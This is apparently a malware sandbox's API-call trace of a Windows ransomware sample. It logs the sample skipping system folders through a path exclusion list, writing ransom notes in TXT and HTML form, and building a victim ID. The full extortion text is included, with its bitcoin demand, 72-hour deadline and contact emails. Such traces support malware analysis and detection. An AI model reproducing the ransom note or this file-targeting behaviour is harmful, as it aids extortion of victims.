	[0171.298] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\", lpString2="Heartbeat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat"
	[0171.298] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat"
	[0171.298] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\"
	[0171.298] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\"
	[0171.299] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*"
	[0171.299] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xa8eea4a6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.327] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*") returned 49
	[0171.327] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.327] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*") returned 0x31
	[0171.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.327] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="windows") returned 0x0
	[0171.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="boot") returned 0x0
	[0171.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="system volume information") returned 0x0
	[0171.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="temp") returned 0x0
	[0171.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="program files") returned 0x0
	[0171.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="appdata") returned 0x0
	[0171.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="application data") returned 0x0
	[0171.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="winnt") returned 0x0
	[0171.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="tmp") returned 0x0
	[0171.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="cache") returned 0x0
	[0171.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.331] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.331] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.331] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="webcache") returned 0x0
	[0171.331] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.331] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="inetcache") returned 0x0
	[0171.331] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.331] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="nvidia") returned 0x0
	[0171.332] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.332] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="packages") returned 0x0
	[0171.332] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.332] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="cookies") returned 0x0
	[0171.332] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.332] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="programdata") returned 0x0
	[0171.332] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xa8eea4a6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.333] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xa8eea4a6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0171.333] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.333] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.333] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat"
	[0171.333] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*"
	[0171.334] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.334] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.334] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.TXT") returned 73
	[0171.334] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.335] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0171.335] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0171.338] CloseHandle (hObject=0x388) returned 1
	[0171.339] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.339] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.340] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0171.341] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0171.341] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.341] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0171.341] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0171.342] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0171.342] CloseHandle (hObject=0x388) returned 1
	[0171.342] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0171.343] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0171.343] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0171.343] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.HTML") returned 74
	[0171.343] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.343] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0171.344] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0171.347] CloseHandle (hObject=0x388) returned 1
	[0171.347] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.347] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0171.348] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0171.348] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0171.349] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.349] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0171.349] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0171.350] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0171.350] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0171.350] CloseHandle (hObject=0x388) returned 1
	[0171.350] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*" (normalized: "c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x7fa8d963, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0171.351] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*") returned 49
	[0171.351] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.351] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Office\\Heartbeat\\*.*", cchLength=0x31 | out: lpsz="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*") returned 0x31
	[0171.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.351] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="windows") returned 0x0
	[0171.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.351] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="boot") returned 0x0
	[0171.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="system volume information") returned 0x0
	[0171.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.352] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="temp") returned 0x0
	[0171.352] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.353] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="program files") returned 0x0
	[0171.353] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="appdata") returned 0x0
	[0171.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="application data") returned 0x0
	[0171.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.355] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="winnt") returned 0x0
	[0171.355] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="tmp") returned 0x0
	[0171.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="cache") returned 0x0
	[0171.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.356] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.356] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="webcache") returned 0x0
	[0171.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="inetcache") returned 0x0
	[0171.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="nvidia") returned 0x0
	[0171.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.357] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="packages") returned 0x0
	[0171.357] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.358] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="cookies") returned 0x0
	[0171.358] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.358] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\office\\heartbeat\\*.*", lpSrch="programdata") returned 0x0
	[0171.358] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.358] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.358] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8eea4a6, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xa8eea4a6, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x7fa8d963, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0171.358] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.358] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa8d963, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fa8d963, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fa8d963, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.359] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa67532, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fa67532, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fa8d963, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.359] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa67532, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7fa67532, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7fa8d963, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0171.359] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0171.359] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0171.359] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9f4eda, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f9f4eda, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f9f4eda, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9ced32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f9ced32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f9f4eda, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xc92aff08, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x183c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1
	[0171.360] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8294a900, ftCreationTime.dwHighDateTime=0x1d0ca66, ftLastAccessTime.dwLowDateTime=0xb52d3978, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x8294a900, ftLastWriteTime.dwHighDateTime=0x1d0ca66, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1
